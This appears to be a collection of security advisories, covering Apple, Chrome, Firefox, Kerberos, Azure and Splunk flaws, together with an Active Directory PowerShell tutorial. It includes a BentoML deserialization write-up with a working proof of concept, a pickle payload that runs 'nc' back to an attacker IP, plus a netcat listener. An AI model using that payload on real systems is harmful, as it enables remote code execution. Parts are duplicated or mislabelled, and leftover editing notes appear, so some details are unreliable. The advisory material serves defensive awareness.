Classification: Impact: Loss of confidentiality, integrity, availability Exploit: Unknown exploit Solution: Update Affected Systems: iOS versions prior to 18.4.1 iPadOS versions prior to 18.4.1 macOS Sequoia versions prior to 15.4.1 tvOS versions prior to 18.4.1 visionOS versions prior to 2.4.1 Visions OS before 2.4.1 Vision Pro Apple TV HD/4K iPad mini 5th/Pro 11-inch/Pro 13-inch/Pro 13.9-inch 3rd gen Risks: Compromise of data confidentiality Bypass of security policies Denial of service Privilege escalation Conclusion: Recently, multiple vulnerabilities were discovered in Apple products. The exploitation of these vulnerabilities is as follows: CVE-2025-31200 The vulnerability CVE-2025-31200 is a memory corruption flaw in Apple’s Core Audio framework. This vulnerability allows code execution when processing a malicious audio stream in a media file. It has been patched in the following versions: tvOS 18.4.1, visionOS 2.4.1, iOS 18.4.1, iPadOS 18.4.1, and macOS Sequoia 15.4.1. Apple has acknowledged reports indicating that this flaw has been exploited in highly sophisticated attacks targeting specific individuals. CVE-2025-31201 The vulnerability CVE-2025-31201 affects Apple’s RPAC component. An attacker with arbitrary read and write capabilities could bypass pointer authentication. This flaw was fixed by removing the vulnerable code section in the same software versions as CVE-2025-31200. Like CVE-2025-31200, this vulnerability has also been exploited in sophisticated attacks. These two vulnerabilities highlight the importance of keeping systems updated to protect against security risks. Users are strongly encouraged to update their devices to the latest available versions to safeguard against these flaws. Note: Apple confirms that both vulnerabilities referenced under CVE-2025-31200 and CVE-2025-31201 are being actively exploited. References: CVE Reference CVE-2025-31200 CVSS Score: 7.50 CVE Reference CVE-2025-31201 CVSS Score: 6.80 Solution: Update Apple iOS versions prior to 18.4.1 https://support.apple.com/en-us/100100 Visions OS before 2.4.1 https://support.apple.com/en-us/100100 macOS Sequoia versions prior to 15.4.1 https://support.apple.com/en-us/100100 Vendor-Specific Advisory: https://support.apple.com/en-us/122282 https://support.apple.com/en-us/122402 https://support.apple.com/en-us/122401 https://support.apple.com/en-us/122400
Multiple Vulnerabilities in Google Chrome
Creation Date | April 16, 2025 Source Google | Chrome Security Bulletin Classification: Impact: Loss of confidentiality, integrity, availability Exploit: Unknown exploit Solution: Update Affected Systems: Chrome versions prior to 135.0.7049.95 for Linux Chrome versions prior to 135.0.7049.95/.96 for Windows Chrome versions prior to 135.0.7049.95/.96 for Mac Conclusion The vulnerabilities CVE-2025-3619 and CVE-2025-3620 were recently identified in the Google Chrome browser, affecting millions of users worldwide. These security flaws present significant risks and require immediate attention to prevent potential exploitation by malicious actors. CVE-2025-3619: Buffer Overflow in Codecs The vulnerability CVE-2025-3619 is classified as critical and involves a buffer overflow in Chrome’s codecs. A buffer overflow occurs when data is written outside the allocated memory boundaries, which could allow an attacker to execute arbitrary code. This flaw could lead to a full system compromise if successfully exploited. CVE-2025-3620: Use-After-Free in USB The vulnerability CVE-2025-3620 is a “use-after-free” flaw in Chrome’s USB functionality. This type of vulnerability occurs when the program attempts to use memory after it has been freed, creating an opportunity for malicious exploitation. This flaw could also allow arbitrary code execution, although it is classified as less severe than CVE-2025-3619. References: CVE-2025-3620 CVSS score 8.10 CVE-2025-3619 CVSS score 9.80 Google Security Advisory : https://chromereleases.googleblog.com/2025/04/stable-channel-update-for-desktop_15.html Solution: Ensure that Google Chrome is updated to version 135.0.7049.95/.96 for Windows and macOS, and 135.0.7049.95 for Linux. This update addresses the identified security vulnerabilities.
Memory Corruption Vulnerability in Mozilla Firefox
Creation Date April 15, 2025 Source Google Chrome Security Bulletin Classification: Impact: Loss of confidentiality, integrity, availability Exploit: Unknown exploit Solution: Update Affected Systems: Firefox versions Prior to 137.0.2 Conclusion: The vulnerability CVE-2025-3608 involves race condition in Firefox’s nsHttpTransaction. A race condition occurs when two processes or threads concurrently access a shared resource, leading to unpredictable behavior. In this case, the race conditions could result in memory corruption, potentially allowing attackers to execute arbitrary code. Impact: This vulnerability is classified as high severity. The resulting memory corruption could enable an attacker to compromise the affected system. References: CVE-2025-3608 CVSS score: 8.10 Mozilla Security Advisory: https://www.mozilla.org/en-US/security/advisories/mfsa2025-25/ Solution: Update to Morilla Firefox 137.0.2 https://www.mozilla.org/en-US/firefox/137.0.2/releasenotes/
Content Spoofing Vulnerability in MIT Kerberos
Title: MIT Kerberos Creation Date: March 24, 2025 Source: Red Hat Security Bulletin Classification: Impact: Loss of integrity Exploit: Unknown Solution: Unknown Affected Systems: Red Hat Ansible Automation Platform version 2 Red Hat Enterprise Linux version 9 Red Hat Enterprise Linux version 7 Red Hat Enterprise Linux version 6 Red Hat Enterprise Linux version 8 Red Hat OpenShift version 4 MIT Kerberos version – MIT Kerberos5 version – Risks: Message Forgery Loss of Integrity Exploitation of Encryption Preferences Conclusion: CVE-2025-3576 is a recently published vulnerability affecting the MIT Kerberos implementation. This vulnerability allows the spoofing of messages protected by GSSAPI using RC4-HMAC-MD5 due to weaknesses in the MD5 checksum design. If RC4 is preferred over stronger encryption types, an attacker could exploit MD5 collisions to forge message integrity codes, potentially leading to unauthorized message tampering. References: CVE-2025-3576 CVSS Vector: CVSS:3.1/AV: N/AC:H/PR: N/UI: N/S: U/C: N/I:H/A: N Attack Vector: Network Attack Complexity: High Privileges Required: None User Interaction: None Scope: Unchanged Confidentiality: None Integrity: High Availability: None Red Hat Bugzilla Advisory https://bugzilla.redhat.com/show_bug.cgi?id=2359465https://bugzilla.redhat.com/show_bug.cgi?id=2359673https://bugzilla.redhat.com/show_bug.cgi?id=2359672
Multiple Vulnerabilities in Microsoft Azure
Multiple Vulnerabilities in Microsoft Azure Date Created : 04/09/2025 Source: Microsoft Azure Security Bulletin Classification: Impact: Loss of integrity, confidentiality, availability Exploit: Unknown Solution: Patch RISKS: Compromised data confidentiality Privilege escalation Affected Systems: Azure Local Cluster versions prior to 2411.2 Azure Stack HCI OS 22H2 versions prior to 10.0.20348.3328 Azure Stack HCI OS 23H2 versions prior to 10.0.25398.1486 Windows Admin Center Windows Admin Center in Azure Portal Conclusion Multiple high-severity vulnerabilities have been identified in Microsoft Azure. These vulnerabilities could allow an attacker to cause information disclosure and privilege escalation. CVE-2025-29819: The issue occurs in Windows Admin Center in Azure Portal. Exploiting this vulnerability could allow a local attacker to disclose information locally. CVE-2025-26628: The issue occurs in Azure Local Cluster. Insufficiently protected credentials in the Azure Local Cluster could allow an authorized attacker to disclose information locally. CVE-2025-27489: The issue occurs in Azure Local. Exploiting this vulnerability could allow a local attacker to escalate privileges locally. CVE-2025-25002: The issue occurs in Azure Local Cluster. Exploiting this vulnerability could allow an adjacent attacker to disclose information locally. References: CVE-2025-25002 CVSS score 6.80 CVE-2025-26628 CVSS score 7.30 CVE-2025-29819 CVSS score 6.20 CVE-2025-27489 CVSS score 7.80 Microsoft Security Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26628 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-25002 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-27489 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-29819 Solution: Security Patch Microsoft Windows Admin Center https://info.microsoft.com/ww-landing-windows-admin-center.html Microsoft Windows Admin Center in Azure Portal Manage a Windows VMs using Windows Admin Center in Azure | Microsoft Learn Microsoft Azure Stack HCI OS 23H2 About updates for Azure Local, version 23H2 – Azure Local | Microsoft Learn Microsoft Azure Stack HCI OS 22H2 https://support.microsoft.com/en-us/topic/release-notes-for-azure-stack-hci-version-22h2-fea63106-a0a9-4b6c-bb72-a07985c98a56
Critical BentoML Vulnerability Enables Remote Code Execution (RCE) – Exploit Available
Vulnerability Identification CVE Reference: CVE-2025-27520 CVSS Score: 9.8 (Critical) Impact: Remote Code Execution (RCE) compromising integrity, confidentiality, and availability Affected Library: BentoML, a Python library for deploying optimized online serving systems for AI applications and model inference Technical Details Root Cause: Insecure deserialization in BentoML Vulnerable Code File: serde.py, where HTTP request payloads can be manipulated Vulnerable Code Snippet: Pyton def deserialize_value(self, payload: Payload) -> t.Any: if "buffer-lengths" not in payload.metadata: return pickle.loads(b"".join(payload.data)) # Unsafe deserialization def deserialize_value(self, payload: Payload) -> t.Any: if "buffer-lengths" not in payload.metadata: return pickle.loads(b"".join(payload.data)) # Unsafe deserialization Data flow analysis confirms payload content comes from HTTP requests that attackers can fully manipulate. The lack of proper validation allows malicious serialized data to execute harmful actions during deserialization. Affected Versions Vulnerable Versions: 1.3.4 through 1.4.2 Risks Complete system compromise: Attackers can gain full control Data theft: Sensitive data exfiltration Denial of Service (DoS): Systems can be rendered unusable Malware installation: Malicious software can be deployed Recommendations Urgent Update: Immediately upgrade to BentoML version 1.4.3 Proof of Concept (PoC) Test Environment Target Server: IP: 10.98.36.123 OS: Ubuntu Attacker Machine: IP: 10.98.36.121 OS: Ubuntu Reproduction Steps Install BentoML on server: Batch pip install -U bentoml pip install -U bentoml 2. Deploy vulnerable service: Pyton # service.py import bentoml @bentoml.service(resources={"cpu": "4"}) class Summarization: def __init__(self): import torch from transformers import pipeline device = "cuda" if torch.cuda.is_available() else "cpu" self.pipeline = pipeline('summarization', device=device) @bentoml.api(batchable=True) def summarize(self, texts: list[str]) -> list[str]: results = self.pipeline(texts) return [item['summary_text'] for item in results] # service.py import bentoml @bentoml.service(resources={"cpu": "4"}) class Summarization: def __init__(self): import torch from transformers import pipeline device = "cuda" if torch.cuda.is_available() else "cpu" self.pipeline = pipeline('summarization', device=device) @bentoml.api(batchable=True) def summarize(self, texts: list[str]) -> list[str]: results = self.pipeline(texts) return [item['summary_text'] for item in results] 3. Run service: Batch # service.py import bentoml @bentoml.service(resources={"cpu": "4"}) class Summarization: def __init__(self): import torch from transformers import pipeline device = "cuda" if torch.cuda.is_available() else "cpu" self.pipeline = pipeline('summarization', device=device) @bentoml.api(batchable=True) def summarize(self, texts: list[str]) -> list[str]: results = self.pipeline(texts) return [item['summary_text'] for item in results] # service.py import bentoml @bentoml.service(resources={"cpu": "4"}) class Summarization: def __init__(self): import torch from transformers import pipeline device = "cuda" if torch.cuda.is_available() else "cpu" self.pipeline = pipeline('summarization', device=device) @bentoml.api(batchable=True) def summarize(self, texts: list[str]) -> list[str]: results = self.pipeline(texts) return [item['summary_text'] for item in results] 4. Attacker listens for connection: Batch nc -lvvp 1234 nc -lvvp 1234 5. Attacker sends malicious payload: Pyton import pickle, os, requests headers = {'Content-Type': 'application/vnd.bentoml+pickle'} class Evil: def __reduce__(self): return (os.system, ('nc 10.98.36.121 1234',)) payload = pickle.dumps(Evil()) requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers) import pickle, os, requests headers = {'Content-Type': 'application/vnd.bentoml+pickle'} class Evil: def __reduce__(self): return (os.system, ('nc 10.98.36.121 1234',)) payload = pickle.dumps(Evil()) requests.post("http://10.98.36.123:3000/summarize", data=payload, headers=headers) 6. Result: The server (10.98.36.123) initiates a connection to the attacker (10.98.36.121) on port 1234, confirming successful RCE.
Apple Security Alert 2024: Critical Vulnerabilities Found – Update Now!
Critical Apple Security Vulnerabilities: What You Need to Know Classification: Impact: Loss of confidentiality, integrity, and availability Exploit: Unknown exploit Solution: Update Affected Systems: iOS versions prior to 15.8.4 iOS versions prior to 16.7.11 iOS versions prior to 18.4 iPadOS versions prior to 15.8.4 iPadOS versions prior to 16.7.11 iPadOS versions prior to 17.7.6 iPadOS versions prior to 18.4 macOS Sequoia versions prior to 15.4 macOS Sonoma versions prior to 14.7.5 macOS Ventura versions prior to 13.7.5 Safari versions prior to 18.4 tvOS versions prior to 18.4 visionOS versions prior to 2.4 Xcode versions prior to 16.3 Risks: Compromised data integrity Compromised data confidentiality Security policy bypass Remote denial of service Arbitrary code execution Privilege escalation Conclusion: Recently, multiple vulnerabilities have been discovered in Apple products. Exploiting these vulnerabilities could allow arbitrary code execution, privilege escalation, information disclosure, security measure bypass, and denial of service. Apple has indicated that the vulnerabilities CVE-2025-24200 and CVE-2025-24201 are being actively exploited. Note: It is recommended to update your devices to protect against these vulnerabilities. References: CVE-2023-27043 CVE-2024-40864 CVE-2024-48958 CVE-2024-54502 CVE-2024-54508 CVE-2024-54533 CVE-2024-54534 CVE-2024-54543 CVE-2024-56171 CVE-2024-9681 CVE-2025-24085 CVE-2025-24093 CVE-2025-24095 CVE-2025-24097 CVE-2025-24113 CVE-2025-24139 CVE-2025-24148 CVE-2025-24157 CVE-2025-24163 CVE-2025-24164 CVE-2025-24167 CVE-2025-24170 CVE-2025-24172 CVE-2025-24173 CVE-2025-24178 CVE-2025-24180 CVE-2025-24181 CVE-2025-24182 CVE-2025-24190 CVE-2025-24191 CVE-2025-24192 CVE-2025-24193 CVE-2025-24194 CVE-2025-24195 CVE-2025-24196 CVE-2025-24198 CVE-2025-24199 CVE-2025-24200 CVE-2025-24201 CVE-2025-24202 CVE-2025-24203 CVE-2025-24204 CVE-2025-24205 CVE-2025-24207 CVE-2025-24208 CVE-2025-24209 CVE-2025-24210 CVE-2025-24211 CVE-2025-24212 CVE-2025-24213 CVE-2025-24214 CVE-2025-24215 CVE-2025-24216 CVE-2025-24217 CVE-2025-24218 CVE-2025-24221 CVE-2025-24226 CVE-2025-24228 CVE-2025-24229 CVE-2025-24230 CVE-2025-24231 CVE-2025-24232 CVE-2025-24233 CVE-2025-24234 CVE-2025-24235 CVE-2025-24236 CVE-2025-24237 CVE-2025-24238 CVE-2025-24239 CVE-2025-24240 CVE-2025-24241 CVE-2025-24242 CVE-2025-24243 CVE-2025-24244 CVE-2025-24245 CVE-2025-24246 CVE-2025-24247 CVE-2025-24248 CVE-2025-24249 CVE-2025-24250 CVE-2025-24253 CVE-2025-24254 CVE-2025-24255 CVE-2025-24256 CVE-2025-24257 CVE-2025-24259 CVE-2025-24260 CVE-2025-24261 CVE-2025-24262 CVE-2025-24263 CVE-2025-24264 CVE-2025-24265 CVE-2025-24266 CVE-2025-24267 CVE-2025-24269 CVE-2025-24272 CVE-2025-24273 CVE-2025-24276 CVE-2025-24277 CVE-2025-24278 CVE-2025-24279 CVE-2025-24280 CVE-2025-24281 CVE-2025-24282 CVE-2025-24283 CVE-2025-27113 CVE-2025-30424 CVE-2025-30425 CVE-2025-30426 CVE-2025-30427 CVE-2025-30428 CVE-2025-30429 CVE-2025-30430 CVE-2025-30432 CVE-2025-30433 CVE-2025-30434 CVE-2025-30435 CVE-2025-30437 CVE-2025-30438 CVE-2025-30439 CVE-2025-30441 CVE-2025-30443 CVE-2025-30444 CVE-2025-30446 CVE-2025-30447 CVE-2025-30449 CVE-2025-30450 CVE-2025-30451 CVE-2025-30452 CVE-2025-30453 CVE-2025-30454 CVE-2025-30455 CVE-2025-30456 CVE-2025-30457 CVE-2025-30458 CVE-2025-30460 CVE-2025-30461 CVE-2025-30462 CVE-2025-30463 CVE-2025-30464 CVE-2025-30465 CVE-2025-30467 CVE-2025-30469 CVE-2025-30470 CVE-2025-30471 CVE-2025-31182 CVE-2025-31183 CVE-2025-31184 CVE-2025-31187 CVE-2025-31188 CVE-2025-31191 CVE-2025-31192 CVE-2025-31194 Vendor-Specific Advisory: https://support.apple.com/en-us/122371 https://support.apple.com/en-us/122379 https://support.apple.com/en-us/122380 https://support.apple.com/en-us/122372 https://support.apple.com/en-us/122346 https://support.apple.com/en-us/122345 https://support.apple.com/en-us/122373 https://support.apple.com/en-us/122374 https://support.apple.com/en-us/122375 https://support.apple.com/en-us/122377 https://support.apple.com/en-us/122378 https://support.apple.com/en-us/122376 🔒 Stay safe, stay updated, and share this alert with other Apple users!
What You Need To Know a Critical Vulnerabilities In Splunk ?
Splunk recently issued a security advisory detailing multiple high-severity vulnerabilities affecting Splunk Enterprise, Splunk Cloud Platform, and Splunk Secure Gateway. These vulnerabilities pose significant risks, including remote code execution (RCE) and information disclosure, potentially allowing attackers to compromise sensitive data or take control of affected systems. Affected Systems The vulnerabilities impact the following versions: Splunk Enterprise : Versions 9.1.0 to 9.1.7 Versions 9.2.0 to 9.2.4 Versions 9.3.0 to 9.3.2 All versions prior to 9.4.1, 9.3.3, 9.2.5, and 9.1.8 Splunk Cloud Platform : Versions earlier than 9.3.2408.104, 9.2.2406.108, and 9.1.2312.208 Splunk Secure Gateway : Versions earlier than 3.8.38 and 3.7.23 Key Vulnerabilities CVE-2025-20229: Remote Code Execution (RCE) CVSS Score : 8.0 (High) Description : This vulnerability could allow an authenticated remote attacker to execute arbitrary code by uploading a malicious file to the $SPLUNK_HOME/var/run/splunk/apptemp directory. Impact : Attackers could gain full control over the affected system, leading to data breaches or further network compromise. CVE-2025-20231 : Information Disclosure CVSS Score : 7.1 (High) Description : Splunk Secure Gateway exposes user session and authorization tokens in plaintext within the splunk_secure_gateway.log file when interacting with the /services/ssg/secrets endpoint. Impact : Attackers could steal sensitive credentials or session tokens, potentially leading to unauthorized access. Recommended Solutions Apply Updates Immediately Upgrade to the latest patched versions: Splunk Enterprise : 9.4.1, 9.3.3, 9.2.5, or 9.1.8 and later. Splunk Cloud Platform : 9.3.2408.104, 9.2.2406.108, or 9.1.2312.208. Splunk Secure Gateway : 3.8.38 or 3.7.23 and later. Download updates from the official Splunk website: https://www.splunk.com. Temporary Workaround for CVE-2025-20231 If Splunk Secure Gateway is not in use, Splunk recommends disabling it as a temporary mitigation. Additional Resources For more details, refer to Splunk’s official advisories: Splunk Advisory SVD-2025-0302 Splunk Advisory SVD-2025-0301 Final Thoughts These vulnerabilities underscore the importance of timely patch management and robust security practices. Organizations using Splunk should prioritize applying these updates to mitigate potential risks. Stay vigilant and ensure your systems are protected against emerging threats. For further updates, follow Splunk’s security bulletins or subscribe to cybersecurity news feeds. Stay secure!
Simplify AD User Creation: GUI & PowerShell
Active Directory (AD) is a crucial component for managing users and resources in an enterprise environment. In this guide, we will cover how to create a user in Active Directory using both the GUI and PowerShell, including bulk user creation with a random password using a CSV file. 1. Creating a User via the Active Directory GUI Follow these steps to create a user using the Active Directory Users and Computers (ADUC) GUI: Step 1: Open Active Directory Users and Computers (ADUC) Press `Win + R`, type `dsa.msc`, and press Enter. Or opens Server manager > Active Directory Users and Computers. Step 2: Navigate to the Organizational Unit (OU) In the left pane, expand your domain. Locate and select the OU where you want to create the user, In this example we are going to choose London OU. Step 3: Create a New User Right-click on the OU, select New, and click User. Fill in the following details: – First Name (e.g., Taha) – Last Name (e.g., kssama) – User logon name (e.g., t.kssama@tic.local) Click Next. Step 4: Set the User’s Password Enter a secure password.Choose the following options:User must change password at next logon Click Next and then Finish. 2. Bulk Creating Users with PowerShell and CSV Step 1: Prepare the CSV File Create a CSV file (e.g., `C:users.csv`) with the following format: FirstName;LastName;Function;OU;Department Note: Step 2: PowerShell Script for Bulk User Creation Copy and paste the following script into Notepad, save it with a .ps1 extension, (e.g., script.ps1) TypeScript $CSVFile = "C:users.csv" $CSVData = Import-CSV -Path $CSVFile -Delimiter "," -Encoding UTF8 $PasswordExportPath = "C:userspassuser_passwords.csv" $ExportFolder = "C:userspass" # Check if the export folder exists, if not, create it if (!(Test-Path $ExportFolder)) { New-Item -ItemType Directory -Path $ExportFolder | Out-Null } # Create an array to store user credentials for export $UserPasswords = @() Foreach ($User in $CSVData) { $UserFirstName = $User.FirstName $UserLastName = $User.LastName $UserSamAccountName = ($UserFirstName.Substring(0,1) + "." + $UserLastName).ToLower() $UserEmail = "$UserSamAccountName@tic.local" $UserFunction = $User.Function $UserDepartment = $User.Department $UserOU = $User.OU # Generate a random 12-character password $UserPassword = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 12 | ForEach-Object {[char]$_}) $SecurePassword = ConvertTo-SecureString $UserPassword -AsPlainText -Force # Check if the user already exists in AD if (Get-ADUser -Filter {SamAccountName -eq $UserSamAccountName}) { Write-Warning "The identifier $UserSamAccountName already exists in AD" } else { # Create the AD user New-ADUser -Name "$UserLastName $UserFirstName" ` -DisplayName "$UserLastName $UserFirstName" ` -GivenName $UserFirstName ` -Surname $UserLastName ` -SamAccountName $UserSamAccountName ` -UserPrincipalName "$UserSamAccountName@tic.local" ` -EmailAddress $UserEmail ` -Title $UserFunction ` -Department $UserDepartment ` -Path $UserOU ` -AccountPassword $SecurePassword ` -ChangePasswordAtLogon $true ` -Enabled $true Write-Output "User created: $UserSamAccountName ($UserLastName $UserFirstName)" # Store credentials for export $UserPasswords += [PSCustomObject]@{ FirstName = $UserFirstName LastName = $UserLastName Username = $UserSamAccountName Password = $UserPassword } } } # Export the generated usernames and passwords to CSV $UserPasswords | Export-Csv -Path $PasswordExportPath -NoTypeInformation -Encoding UTF8 Write-Output "User credentials exported to $PasswordExportPath" $CSVFile = "C:users.csv" $CSVData = Import-CSV -Path $CSVFile -Delimiter "," -Encoding UTF8 $PasswordExportPath = "C:userspassuser_passwords.csv" $ExportFolder = "C:userspass" # Check if the export folder exists, if not, create it if (!(Test-Path $ExportFolder)) { New-Item -ItemType Directory -Path $ExportFolder | Out-Null } # Create an array to store user credentials for export $UserPasswords = @() Foreach ($User in $CSVData) { $UserFirstName = $User.FirstName $UserLastName = $User.LastName $UserSamAccountName = ($UserFirstName.Substring(0,1) + "." + $UserLastName).ToLower() $UserEmail = "$UserSamAccountName@tic.local" $UserFunction = $User.Function $UserDepartment = $User.Department $UserOU = $User.OU # Generate a random 12-character password $UserPassword = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 12 | ForEach-Object {[char]$_}) $SecurePassword = ConvertTo-SecureString $UserPassword -AsPlainText -Force # Check if the user already exists in AD if (Get-ADUser -Filter {SamAccountName -eq $UserSamAccountName}) { Write-Warning "The identifier $UserSamAccountName already exists in AD" } else { # Create the AD user New-ADUser -Name "$UserLastName $UserFirstName" ` -DisplayName "$UserLastName $UserFirstName" ` -GivenName $UserFirstName ` -Surname $UserLastName ` -SamAccountName $UserSamAccountName ` -UserPrincipalName "$UserSamAccountName@tic.local" ` -EmailAddress $UserEmail ` -Title $UserFunction ` -Department $UserDepartment ` -Path $UserOU ` -AccountPassword $SecurePassword ` -ChangePasswordAtLogon $true ` -Enabled $true Write-Output "User created: $UserSamAccountName ($UserLastName $UserFirstName)" # Store credentials for export $UserPasswords += [PSCustomObject]@{ FirstName = $UserFirstName LastName = $UserLastName Username = $UserSamAccountName Password = $UserPassword } } } # Export the generated usernames and passwords to CSV $UserPasswords | Export-Csv -Path $PasswordExportPath -NoTypeInformation -Encoding UTF8 Write-Output "User credentials exported to $PasswordExportPath" Step 3: Run the Script Open PowerShell as Administrator and navigate to the path where the .ps1 file is located. Before you run the script don’t forget to modify the path of the CSV file if needed. Run the script: .script.ps1 After running the script, you will encounter the following result: Step 4: Verify the Created Users Run the following command in PowerShell to check if the users were created: PowerShell Get-ADUser -Filter * | Select-Object Name, SamAccountName Get-ADUser -Filter * | Select-Object Name, SamAccountName Step 5: Access the User Credentials CSV After running the script, check the folder `C:userspassuser_passwords.csv` to retrieve the generated usernames and passwords. Conclusion GUI: Best for creating a single user interactively.• PowerShell (Bulk Creation): Best for creating multiple users quickly with predefined attributes.• CSV Automation: Ensures consistency and saves time in large environments. This guide provides a seamless way to efficiently manage users in Active Directory. 🚀 Happy admin work! 😊
Critical Vulnerability in Mozilla Firefox
Classification: – Impact : Loss of confidentiality, integrity, and availability – Exploitability : Unknown exploit – Resolution : Apply updates Affected Versions: – Firefox 136.0.4 – Firefox ESR 128.8.1 – Firefox ESR 115.21.1 Risk Assessment: – Remote code execution (RCE) allowing system compromise. Vulnerability Summary: Mozilla has patched a critical sandbox escape vulnerability in Firefox’s Inter-Process Communication (IPC) mechanism. Attackers could exploit improper handling of system handles to elevate privileges and bypass sandbox protections, potentially gaining control of affected systems. This flaw shares similarities with CVE-2025-2783, a recently exploited Chrome vulnerability. Patched Versions: – Firefox 136.0.4 – Firefox ESR 128.8.1 – Firefox ESR 115.21.1 Action Required : Immediate update to the latest version to mitigate exploitation risks. References: – CVE-2025-2857 – CVSS 3.1 Score : 9.8 (Critical) Remediation: Download the latest secure release: – [Firefox 136.0.4 Release Notes Firefox 136.0.4, See All New Features, Updates and Fixes – [Firefox ESR 115.21.1 Release Notes Firefox ESR 115.2.1, See All New Features, Updates and Fixes – [Firefox ESR 128.8.1 Release Notes Firefox ESR 128.8.1, See All New Features, Updates and Fixes Key Improvements: Stronger Structure : Clear section headers and bullet points for readability. Technical Precision : Terms like “sandbox escape” and “RCE” align with industry standards. Conciseness : Removed redundant phrasing (e.g., “It is strongly recommended” → “Action Required”). Professional Tone : Neutral yet urgent language for security advisories.